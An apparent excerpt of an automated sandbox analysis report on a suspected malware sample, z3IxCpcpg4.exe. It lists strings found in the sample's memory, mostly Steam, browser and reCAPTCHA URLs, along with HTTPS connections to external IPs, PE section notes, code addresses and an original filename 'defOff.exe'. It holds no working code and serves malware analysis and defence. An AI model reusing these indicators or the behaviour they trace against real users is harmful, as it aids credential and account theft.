Source: z3IxCpcpg4.exe, 00000000.00000003.2178710579.0000000000931000.00000004.00000020.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2156395813.00000000008E3000.00000004.00000020.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2156355499.0000000000921000.00000004.00000020.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2156355499.0000000000926000.00000004.00000020.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2178956574.00000000008E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
Source: z3IxCpcpg4.exe, 00000000.00000003.2156355499.0000000000926000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900
Source: z3IxCpcpg4.exe, 00000000.00000003.2178710579.0000000000931000.00000004.00000020.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2156355499.0000000000926000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/market/
Source: z3IxCpcpg4.exe, 00000000.00000003.2178710579.0000000000931000.00000004.00000020.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2156355499.0000000000926000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/my/wishlist/
Source: z3IxCpcpg4.exe, 00000000.00000003.2178710579.0000000000931000.00000004.00000020.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2156395813.00000000008E3000.00000004.00000020.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2156355499.0000000000921000.00000004.00000020.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2156355499.0000000000926000.00000004.00000020.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2178956574.00000000008E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/badges
Source: z3IxCpcpg4.exe, 00000000.00000003.2178710579.0000000000931000.00000004.00000020.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2156395813.00000000008E3000.00000004.00000020.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2156355499.0000000000921000.00000004.00000020.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2156355499.0000000000926000.00000004.00000020.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2178956574.00000000008E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/inventory/
Source: z3IxCpcpg4.exe, 00000000.00000003.2178710579.0000000000931000.00000004.00000020.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2156355499.0000000000926000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/workshop/
Source: z3IxCpcpg4.exe, 00000000.00000003.2178956574.0000000000911000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/
Source: z3IxCpcpg4.exe, 00000000.00000003.2156395813.00000000008E3000.00000004.00000020.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2156395813.0000000000911000.00000004.00000020.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2178956574.0000000000911000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/;
Source: z3IxCpcpg4.exe, 00000000.00000003.2156395813.00000000008E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7C185ce35c568ebbb
Source: z3IxCpcpg4.exe, 00000000.00000003.2156355499.0000000000926000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/about/
Source: z3IxCpcpg4.exe, 00000000.00000003.2178710579.0000000000931000.00000004.00000020.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2156355499.0000000000926000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/explore/
Source: z3IxCpcpg4.exe, 00000000.00000003.2178710579.0000000000931000.00000004.00000020.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2156395813.00000000008E3000.00000004.00000020.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2156355499.0000000000921000.00000004.00000020.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2156355499.0000000000926000.00000004.00000020.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2178956574.00000000008E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/legal/
Source: z3IxCpcpg4.exe, 00000000.00000003.2178710579.0000000000931000.00000004.00000020.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2156355499.0000000000926000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/mobile
Source: z3IxCpcpg4.exe, 00000000.00000003.2178710579.0000000000931000.00000004.00000020.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2156355499.0000000000926000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/news/
Source: z3IxCpcpg4.exe, 00000000.00000003.2178710579.0000000000931000.00000004.00000020.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2156355499.0000000000926000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/points/shop/
Source: z3IxCpcpg4.exe, 00000000.00000003.2178710579.0000000000931000.00000004.00000020.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2156355499.0000000000926000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/privacy_agreement/
Source: z3IxCpcpg4.exe, 00000000.00000003.2178710579.0000000000931000.00000004.00000020.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2156355499.0000000000926000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/stats/
Source: z3IxCpcpg4.exe, 00000000.00000003.2178710579.0000000000931000.00000004.00000020.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2156355499.0000000000926000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/steam_refunds/
Source: z3IxCpcpg4.exe, 00000000.00000003.2178710579.0000000000931000.00000004.00000020.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2156355499.0000000000926000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/subscriber_agreement/
Source: z3IxCpcpg4.exe, 00000000.00000003.2261981660.00000000053E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: z3IxCpcpg4.exe, 00000000.00000003.2261981660.00000000053E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: chromecache_99.6.dr, chromecache_118.6.dr	String found in binary or memory: https://twitter.com/intent/tweet?original_referer=$
Source: chromecache_99.6.dr, chromecache_118.6.dr	String found in binary or memory: https://videoencodingpublic-hgeaeyeba8gycee3.b01.azurefd.net/public-09ce73a6-05a5-4e4d-b3d7-bd5a8c05
Source: chromecache_118.6.dr	String found in binary or memory: https://videoencodingpublic-hgeaeyeba8gycee3.b01.azurefd.net/public-b4da8140-92cf-421c-8b7b-e471d5b9
Source: z3IxCpcpg4.exe, 00000000.00000003.2285428309.0000000005167000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref
Source: z3IxCpcpg4.exe, 00000000.00000003.2211227482.00000000051A2000.00000004.00000800.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2211143601.00000000051A4000.00000004.00000800.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2211352399.00000000051A2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: z3IxCpcpg4.exe, 00000000.00000003.2156395813.00000000008E3000.00000004.00000020.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2156395813.0000000000911000.00000004.00000020.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2178956574.0000000000911000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: z3IxCpcpg4.exe, 00000000.00000003.2211227482.00000000051A2000.00000004.00000800.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2211143601.00000000051A4000.00000004.00000800.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2211352399.00000000051A2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: z3IxCpcpg4.exe, 00000000.00000003.2178956574.0000000000911000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/recaptcha/
Source: z3IxCpcpg4.exe, 00000000.00000003.2156395813.00000000008E3000.00000004.00000020.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2156395813.0000000000911000.00000004.00000020.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2178956574.0000000000911000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.cn/recaptcha/
Source: z3IxCpcpg4.exe, 00000000.00000003.2156395813.00000000008E3000.00000004.00000020.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2156395813.0000000000911000.00000004.00000020.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2178956574.0000000000911000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/recaptcha/
Source: chromecache_99.6.dr, chromecache_118.6.dr	String found in binary or memory: https://www.linkedin.com/cws/share?url=$
Source: z3IxCpcpg4.exe, 00000000.00000003.2261981660.00000000053E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
Source: z3IxCpcpg4.exe, 00000000.00000003.2261981660.00000000053E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
Source: z3IxCpcpg4.exe, 00000000.00000003.2261981660.00000000053E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: z3IxCpcpg4.exe, 00000000.00000003.2261981660.00000000053E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: z3IxCpcpg4.exe, 00000000.00000003.2261981660.00000000053E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
Source: z3IxCpcpg4.exe, 00000000.00000003.2261981660.00000000053E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: z3IxCpcpg4.exe, 00000000.00000003.2178710579.0000000000931000.00000004.00000020.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2156355499.0000000000926000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
Source: z3IxCpcpg4.exe, 00000000.00000003.2156395813.00000000008E3000.00000004.00000020.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2156395813.0000000000911000.00000004.00000020.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2178956574.0000000000911000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com
Source: z3IxCpcpg4.exe, 00000000.00000003.2156395813.00000000008E3000.00000004.00000020.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2156395813.0000000000911000.00000004.00000020.00020000.00000000.sdmp, z3IxCpcpg4.exe, 00000000.00000003.2178956574.0000000000911000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/

Source: unknown	Network traffic detected: HTTP traffic on port 49674 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49795 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown	Network traffic detected: HTTP traffic on port 49979 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49913
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49979
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49811
Source: unknown	Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown	Network traffic detected: HTTP traffic on port 49673 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49795
Source: unknown	Network traffic detected: HTTP traffic on port 49703 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49913 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown	Network traffic detected: HTTP traffic on port 49811 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49704
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49703
Source: unknown	Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443

Source: unknown	HTTPS traffic detected: 23.55.153.106:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.5:49705 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.5:49706 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.5:49707 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.5:49708 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.5:49710 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.5:49718 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.5:49725 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.5:49737 version: TLS 1.2

System Summary

PE file contains section with special chars

Source: z3IxCpcpg4.exe	Static PE information: section name:
Source: z3IxCpcpg4.exe	Static PE information: section name: .rsrc
Source: z3IxCpcpg4.exe	Static PE information: section name: .idata

Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Code function: 0_2_00F158D5	0_2_00F158D5
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Code function: 0_2_00F0B100	0_2_00F0B100
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Code function: 0_2_00F39280	0_2_00F39280
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Code function: 0_2_00F23B50	0_2_00F23B50
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Code function: 0_2_00F2D34A	0_2_00F2D34A
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Code function: 0_2_00F40460	0_2_00F40460
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Code function: 0_2_00F27440	0_2_00F27440
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Code function: 0_2_00F3C5A0	0_2_00F3C5A0
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Code function: 0_2_00F40D20	0_2_00F40D20
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Code function: 0_2_00F21D00	0_2_00F21D00
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Code function: 0_2_00F38EA0	0_2_00F38EA0
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Code function: 0_2_00F0E687	0_2_00F0E687
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Code function: 0_2_00F22E6D	0_2_00F22E6D
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Code function: 0_2_00F0CE45	0_2_00F0CE45
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Code function: 0_2_00F08600	0_2_00F08600
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Code function: 0_2_00F12750	0_2_00F12750
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Code function: 0_2_00F1B8F6	0_2_00F1B8F6
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Code function: 0_2_00F2C0E6	0_2_00F2C0E6
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Code function: 0_2_00F160E9	0_2_00F160E9
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Code function: 0_2_00F338D0	0_2_00F338D0
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Code function: 0_2_00F2A0CA	0_2_00F2A0CA
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Code function: 0_2_00F388B0	0_2_00F388B0
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Code function: 0_2_00F1C8A0	0_2_00F1C8A0
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Code function: 0_2_00F2C09E	0_2_00F2C09E
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Code function: 0_2_00F0C840	0_2_00F0C840
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Code function: 0_2_010B69CC	0_2_010B69CC
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Code function: 0_2_00F0D83C	0_2_00F0D83C
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Code function: 0_2_00F0D021	0_2_00F0D021
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Code function: 0_2_00F1D003	0_2_00F1D003
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Code function: 0_2_00F409E0	0_2_00F409E0
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Code function: 0_2_00F2C9EB	0_2_00F2C9EB
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Code function: 0_2_00F281CC	0_2_00F281CC
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Code function: 0_2_00F239B9	0_2_00F239B9
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Code function: 0_2_00F291AE	0_2_00F291AE
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Code function: 0_2_00F2E180	0_2_00F2E180
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Code function: 0_2_00F3F18B	0_2_00F3F18B
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Code function: 0_2_00F0397B	0_2_00F0397B
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Code function: 0_2_00F06160	0_2_00F06160
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Code function: 0_2_00F1E960	0_2_00F1E960
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Code function: 0_2_00F18169	0_2_00F18169
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Code function: 0_2_00F2C09E	0_2_00F2C09E
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Code function: 0_2_00F26910	0_2_00F26910
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Code function: 0_2_00F05901	0_2_00F05901
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Code function: 0_2_00F19AD0	0_2_00F19AD0
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Code function: 0_2_00F242D0	0_2_00F242D0
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Code function: 0_2_00F28ABC	0_2_00F28ABC
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Code function: 0_2_00F39A80	0_2_00F39A80
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Code function: 0_2_00F04270	0_2_00F04270
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Code function: 0_2_00F3CA40	0_2_00F3CA40
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Code function: 0_2_00F35A4F	0_2_00F35A4F
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Code function: 0_2_00F3DA4D	0_2_00F3DA4D
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Code function: 0_2_00F1E220	0_2_00F1E220
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Code function: 0_2_00F073D0	0_2_00F073D0
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Code function: 0_2_00F283D8	0_2_00F283D8
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Code function: 0_2_00F0F3C0	0_2_00F0F3C0
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Code function: 0_2_00F1EB80	0_2_00F1EB80
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Code function: 0_2_00F2F377	0_2_00F2F377
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Code function: 0_2_00F0AB40	0_2_00F0AB40
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Code function: 0_2_00F21340	0_2_00F21340
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Code function: 0_2_00F09310	0_2_00F09310
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Code function: 0_2_00F18B1B	0_2_00F18B1B
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Code function: 0_2_00F0D4F3	0_2_00F0D4F3
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Code function: 0_2_00F31CF0	0_2_00F31CF0
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Code function: 0_2_00F224E0	0_2_00F224E0
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Code function: 0_2_00F204C6	0_2_00F204C6
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Code function: 0_2_00F14CA0	0_2_00F14CA0
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Code function: 0_2_00F1747D	0_2_00F1747D
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Code function: 0_2_00F3A440	0_2_00F3A440
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Code function: 0_2_00F33C10	0_2_00F33C10
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Code function: 0_2_00F3CDF0	0_2_00F3CDF0
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Code function: 0_2_00F3A5D4	0_2_00F3A5D4
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Code function: 0_2_00F05DC0	0_2_00F05DC0
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Code function: 0_2_00F37DA9	0_2_00F37DA9
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Code function: 0_2_00F3FD70	0_2_00F3FD70
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Code function: 0_2_00F24560	0_2_00F24560
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Code function: 0_2_00F2CD5E	0_2_00F2CD5E
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Code function: 0_2_00F2CD4C	0_2_00F2CD4C
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Code function: 0_2_00F39D30	0_2_00F39D30
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Code function: 0_2_00F2C53C	0_2_00F2C53C
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Code function: 0_2_00F11D2B	0_2_00F11D2B
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Code function: 0_2_00F26D2E	0_2_00F26D2E
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Code function: 0_2_00F1051B	0_2_00F1051B
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Code function: 0_2_00F406F0	0_2_00F406F0
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Code function: 0_2_00F246D0	0_2_00F246D0
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Code function: 0_2_00F1AEB0	0_2_00F1AEB0
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Code function: 0_2_00F2FE74	0_2_00F2FE74
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Code function: 0_2_00F2EE63	0_2_00F2EE63
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Code function: 0_2_00F20E6C	0_2_00F20E6C
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Code function: 0_2_00F38650	0_2_00F38650
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Code function: 0_2_00F1E630	0_2_00F1E630
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Code function: 0_2_00F1961B	0_2_00F1961B
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Code function: 0_2_00F3FE00	0_2_00F3FE00
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Code function: 0_2_00F0F60D	0_2_00F0F60D
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Code function: 0_2_00F09780	0_2_00F09780
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Code function: 0_2_00F1DF50	0_2_00F1DF50
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Code function: 0_2_00F16F52	0_2_00F16F52
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Code function: 0_2_00F27740	0_2_00F27740
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Code function: 0_2_00F29739	0_2_00F29739
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Code function: 0_2_00F25F1B	0_2_00F25F1B
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Code function: 0_2_05E857EE	0_2_05E857EE
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Code function: 0_2_05E73EFF	0_2_05E73EFF
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Code function: 0_2_05E8564D	0_2_05E8564D

Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Code function: String function: 00F07F60 appears 40 times
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Code function: String function: 00F14C90 appears 77 times

Source: z3IxCpcpg4.exe, 00000000.00000003.2423683834.00000000055E8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs z3IxCpcpg4.exe
Source: z3IxCpcpg4.exe, 00000000.00000003.2432631878.0000000005845000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs z3IxCpcpg4.exe
Source: z3IxCpcpg4.exe, 00000000.00000003.2441854932.00000000059D6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs z3IxCpcpg4.exe
Source: z3IxCpcpg4.exe, 00000000.00000003.2432020842.0000000005774000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs z3IxCpcpg4.exe
Source: z3IxCpcpg4.exe, 00000000.00000003.2430140264.00000000058D5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs z3IxCpcpg4.exe
Source: z3IxCpcpg4.exe, 00000000.00000003.2440796075.00000000058A2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs z3IxCpcpg4.exe
Source: z3IxCpcpg4.exe, 00000000.00000003.2432140026.0000000005841000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs z3IxCpcpg4.exe
Source: z3IxCpcpg4.exe, 00000000.00000003.2436451917.0000000005868000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs z3IxCpcpg4.exe
Source: z3IxCpcpg4.exe, 00000000.00000003.2431903266.00000000058F1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs z3IxCpcpg4.exe
Source: z3IxCpcpg4.exe, 00000000.00000003.2441161630.000000000576B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs z3IxCpcpg4.exe
Source: z3IxCpcpg4.exe, 00000000.00000003.2436315243.0000000005770000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs z3IxCpcpg4.exe
Source: z3IxCpcpg4.exe, 00000000.00000003.2433667981.0000000005772000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs z3IxCpcpg4.exe
Source: z3IxCpcpg4.exe, 00000000.00000003.2442380478.000000000576F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs z3IxCpcpg4.exe
